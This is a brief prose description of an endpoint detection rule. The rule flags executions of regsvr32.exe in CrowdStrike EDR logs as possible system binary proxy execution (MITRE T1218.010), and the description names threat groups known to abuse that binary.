This detection rule is designed to identify the execution of `regsvr32.exe`, a legitimate Windows system binary that can be leveraged by adversaries to load malicious DLL files. This behavior is particularly notable among threat actors who utilize Living Off the Land techniques, where native system tools are exploited for malicious purposes. The technique falls under the broader category of defense evasion, specifically targeting system binary proxy execution as defined in MITRE ATT&CK under T1218.010. The rule utilizes data from the CrowdStrike endpoint detection and response (EDR) logs to monitor process activities related to `regsvr32.exe`. In particular, it checks for any executions of this binary within the last two hours on Windows platforms. Several threat actors, including Kimsuky, TA551, and groups associated with ransomware such as Conti and Black Basta, have been known to exploit this binary, making the detection crucial for identifying possible malicious activities in the environment. The rule’s logic captures relevant process creation events, helping security teams respond to potential threats quickly, ensuring a proactive defense posture against such tactics.